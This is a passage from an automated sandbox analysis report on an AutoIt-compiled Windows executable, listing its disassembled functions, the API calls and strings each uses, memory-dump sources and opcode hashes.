                                                                                        • Instruction Fuzzy Hash: CCB09231254308ABCA022B91EC09B8C3F68EB46AA2F404434FA0D84C60CB6254548B99
                                                                                        Function 0042F1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: fe7d9b8eee1d273b37d623b7cc6cd26b30c9621dfee01b7311cae72a06f2c816
                                                                                        • Instruction ID: 9dbe1c865c2330f56ffee62ed517aae1867acb93b770053fb6672ec4a27fddfc
                                                                                        • Opcode Fuzzy Hash: fe7d9b8eee1d273b37d623b7cc6cd26b30c9621dfee01b7311cae72a06f2c816
                                                                                        • Instruction Fuzzy Hash: 08322861E29F114DD7239634D832336A258AFB73C8F95D737F819B5AA5EB28D4C34208
                                                                                        Function 0043242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9a83e6c9a1e03463649304356993a4cc28f03311dd18012bd76db8a2bb8b356c
                                                                                        • Instruction ID: 6c6381ca5121d9a8a5ca5470a2620081c1b3ce1be078dbaf297b8ac86cff2730
                                                                                        • Opcode Fuzzy Hash: 9a83e6c9a1e03463649304356993a4cc28f03311dd18012bd76db8a2bb8b356c
                                                                                        • Instruction Fuzzy Hash: E2B10130E2AF414DD72396398935336BA5CAFBB2C5F51D72BFC2670D22EB2185934185
                                                                                        Function 00464C53 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00464C76
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: mouse_event
                                                                                        • String ID:
                                                                                        • API String ID: 2434400541-0
                                                                                        • Opcode ID: ee9df15493a40b048f6a63b66618f3ae232bfa5e5e2bfa15106318706817909b
                                                                                        • Instruction ID: b34e2a9394489d035c963e7dd8f40c9807a13273b0ab6c7f74163ad9f46ae88e
                                                                                        • Opcode Fuzzy Hash: ee9df15493a40b048f6a63b66618f3ae232bfa5e5e2bfa15106318706817909b
                                                                                        • Instruction Fuzzy Hash: BED05EA032220838ECA807209D5FF7F1109E3C0B81F96854B7241853C1F8DC6801A03F
                                                                                        Function 004587B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00458389), ref: 004587D1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: LogonUser
                                                                                        • String ID:
                                                                                        • API String ID: 1244722697-0
                                                                                        • Opcode ID: 18205445d52b48e02bcf404b6a946f346a5f79f7dd958708f793c28153997f24
                                                                                        • Instruction ID: bbaf709efb0beb88cdfa5f1a33ae6004459e2c5163e494cc38a8a30eb56211a1
                                                                                        • Opcode Fuzzy Hash: 18205445d52b48e02bcf404b6a946f346a5f79f7dd958708f793c28153997f24
                                                                                        • Instruction Fuzzy Hash: 49D05E3226050EAFEF018EA4DC01EAE3B69EB04B01F408521FE15D50A1C775E835AB60
                                                                                        Function 0042A124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0042A12A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                        • String ID:
                                                                                        • API String ID: 3192549508-0
                                                                                        • Opcode ID: de316c34264f802ad97e41e2d96b97a4976e2443a0324b54249a0beeda03384a
                                                                                        • Instruction ID: 5f0b767449e3d37fa0a9cb76ca1a1966b2bcebad2f74a673b8e7725f9ca30b43
                                                                                        • Opcode Fuzzy Hash: de316c34264f802ad97e41e2d96b97a4976e2443a0324b54249a0beeda03384a
                                                                                        • Instruction Fuzzy Hash: E2A0113000020CAB8A022B82EC08888BFACEA022A0B008030F80C808228B32A8208A88
                                                                                        Function 00418808 Relevance: .6, Instructions: 590COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: bc918cabfbc13eeeaccb278bb908b555cf4655f640fadc8373e86b06f087c2cb
                                                                                        • Instruction ID: d3e05baf70842595a15b67714876080b4d37379fdc1224c105ba09137936e944
                                                                                        • Opcode Fuzzy Hash: bc918cabfbc13eeeaccb278bb908b555cf4655f640fadc8373e86b06f087c2cb
                                                                                        • Instruction Fuzzy Hash: 44223730904506CBDF288A68C4A47BEB7A1BF41345F28816FDD468B693DB7C9CD6C74A
                                                                                        Function 004221C5 Relevance: .3, Instructions: 345COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                        • Instruction ID: 35e5cfd0643d00128ec34ecd890c43f992cb4d917009b55117061340238bc551
                                                                                        • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                        • Instruction Fuzzy Hash: 18C1D83230507349DF2D4639953403FFAA15EA27B139A076FD8B3CB2D4EE18D965D624
                                                                                        Function 004225FA Relevance: .3, Instructions: 341COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                        • Instruction ID: 4494295b5c4546222a84ad3f443fcd2c01bced2acdb834a923f1c328fe2fc13d
                                                                                        • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                        • Instruction Fuzzy Hash: CAC1D4333090B34ADF2D4639953403FBAA15EA27B139B036FD4B2DB2D4EE18D925D624
                                                                                        Function 00477806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DeleteObject.GDI32(00000000), ref: 0047785B
                                                                                        • DeleteObject.GDI32(00000000), ref: 0047786D
                                                                                        • DestroyWindow.USER32 ref: 0047787B
                                                                                        • GetDesktopWindow.USER32 ref: 00477895
                                                                                        • GetWindowRect.USER32(00000000), ref: 0047789C
                                                                                        • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 004779DD
                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 004779ED
                                                                                        • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477A35
                                                                                        • GetClientRect.USER32(00000000,?), ref: 00477A41
                                                                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00477A7B
                                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477A9D
                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477AB0
                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477ABB
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00477AC4
                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477AD3
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00477ADC
                                                                                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477AE3
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00477AEE
                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477B00
                                                                                        • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00492CAC,00000000), ref: 00477B16
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00477B26
                                                                                        • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00477B4C
                                                                                        • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00477B6B
                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477B8D
                                                                                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477D7A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                        • String ID: $AutoIt v3$DISPLAY$static
                                                                                        • API String ID: 2211948467-2373415609
                                                                                        • Opcode ID: cbe7ba0df42561e6311dda8264485de7e40118ff6f13b361737e76822355802e
                                                                                        • Instruction ID: 98d8c47751f1291c48596143d1a8e41d269c6aae9b6b01708d63eada7aa7ec2c
                                                                                        • Opcode Fuzzy Hash: cbe7ba0df42561e6311dda8264485de7e40118ff6f13b361737e76822355802e
                                                                                        • Instruction Fuzzy Hash: DE027A71900105EFDB14DFA4DC89EAE7BB9FF49310F10856AF905AB2A1C738AD41CB68
                                                                                        Function 0048356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CharUpperBuffW.USER32(?,?,0048F910), ref: 00483627
                                                                                        • IsWindowVisible.USER32(?), ref: 0048364B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharUpperVisibleWindow
                                                                                        • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                        • API String ID: 4105515805-45149045
                                                                                        • Opcode ID: df18ccac80ca4098b50a46d9e4b82a0c4588cfc9e14ecf85f4615084e1af2d64
                                                                                        • Instruction ID: 9f5fdaa8788cae778637d634d7abea83d78ef325d3b9343814b8d9d38e530adb
                                                                                        • Opcode Fuzzy Hash: df18ccac80ca4098b50a46d9e4b82a0c4588cfc9e14ecf85f4615084e1af2d64
                                                                                        • Instruction Fuzzy Hash: 28D19E702042009BCA04FF11C451A6E77E5AF55759F54886EF8826B3A3DB3DEE0ACB5A
                                                                                        Function 0048A5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetTextColor.GDI32(?,00000000), ref: 0048A630
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 0048A661
                                                                                        • GetSysColor.USER32(0000000F), ref: 0048A66D
                                                                                        • SetBkColor.GDI32(?,000000FF), ref: 0048A687
                                                                                        • SelectObject.GDI32(?,00000000), ref: 0048A696
                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 0048A6C1
                                                                                        • GetSysColor.USER32(00000010), ref: 0048A6C9
                                                                                        • CreateSolidBrush.GDI32(00000000), ref: 0048A6D0
                                                                                        • FrameRect.USER32(?,?,00000000), ref: 0048A6DF
                                                                                        • DeleteObject.GDI32(00000000), ref: 0048A6E6
                                                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 0048A731
                                                                                        • FillRect.USER32(?,?,00000000), ref: 0048A763
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0048A78E
                                                                                          • Part of subcall function 0048A8CA: GetSysColor.USER32(00000012), ref: 0048A903
                                                                                          • Part of subcall function 0048A8CA: SetTextColor.GDI32(?,?), ref: 0048A907
                                                                                          • Part of subcall function 0048A8CA: GetSysColorBrush.USER32(0000000F), ref: 0048A91D
                                                                                          • Part of subcall function 0048A8CA: GetSysColor.USER32(0000000F), ref: 0048A928
                                                                                          • Part of subcall function 0048A8CA: GetSysColor.USER32(00000011), ref: 0048A945
                                                                                          • Part of subcall function 0048A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0048A953
                                                                                          • Part of subcall function 0048A8CA: SelectObject.GDI32(?,00000000), ref: 0048A964
                                                                                          • Part of subcall function 0048A8CA: SetBkColor.GDI32(?,00000000), ref: 0048A96D
                                                                                          • Part of subcall function 0048A8CA: SelectObject.GDI32(?,?), ref: 0048A97A
                                                                                          • Part of subcall function 0048A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0048A999
                                                                                          • Part of subcall function 0048A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0048A9B0
                                                                                          • Part of subcall function 0048A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0048A9C5
                                                                                          • Part of subcall function 0048A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0048A9ED
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                        • String ID:
                                                                                        • API String ID: 3521893082-0
                                                                                        • Opcode ID: e736afda7f8d8f4f81f1f5e827ea2c9cb71a52f7c0883247402ba6a9b2613b70
                                                                                        • Instruction ID: fb34620bd59db4fe0d00bba54468f49f6ea6f7247eb536f08ce7ecc3d6e9d283
                                                                                        • Opcode Fuzzy Hash: e736afda7f8d8f4f81f1f5e827ea2c9cb71a52f7c0883247402ba6a9b2613b70
                                                                                        • Instruction Fuzzy Hash: 5E917D72408301BFD710AF64DC08A5F7BA9FB89321F100F2EF962961A1D774D949CB5A
                                                                                        Function 00402C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DestroyWindow.USER32(?,?,?), ref: 00402CA2
                                                                                        • DeleteObject.GDI32(00000000), ref: 00402CE8
                                                                                        • DeleteObject.GDI32(00000000), ref: 00402CF3
                                                                                        • DestroyIcon.USER32(00000000,?,?,?), ref: 00402CFE
                                                                                        • DestroyWindow.USER32(00000000,?,?,?), ref: 00402D09
                                                                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 0043C43B
                                                                                        • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0043C474
                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0043C89D
                                                                                          • Part of subcall function 00401B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00402036,?,00000000,?,?,?,?,004016CB,00000000,?), ref: 00401B9A
                                                                                        • SendMessageW.USER32(?,00001053), ref: 0043C8DA
                                                                                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0043C8F1
                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0043C907
                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0043C912
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                        • String ID: 0
                                                                                        • API String ID: 464785882-4108050209
                                                                                        • Opcode ID: 4375e54c2866febaad8ffc9ac244cdd1ac029a08f3163fb11202e14e0822a081
                                                                                        • Instruction ID: 2a922f2165ff82378a3b73503dcd1cf133edd61f128b8a365017e979e5fddc8b
                                                                                        • Opcode Fuzzy Hash: 4375e54c2866febaad8ffc9ac244cdd1ac029a08f3163fb11202e14e0822a081
                                                                                        • Instruction Fuzzy Hash: E112BF30604211EFDB15DF24C988BAAB7E1BF08304F54557EE855EB2A2C779E842CF99
                                                                                        Function 004774AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DestroyWindow.USER32(00000000), ref: 004774DE
                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0047759D
                                                                                        • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004775DB
                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 004775ED
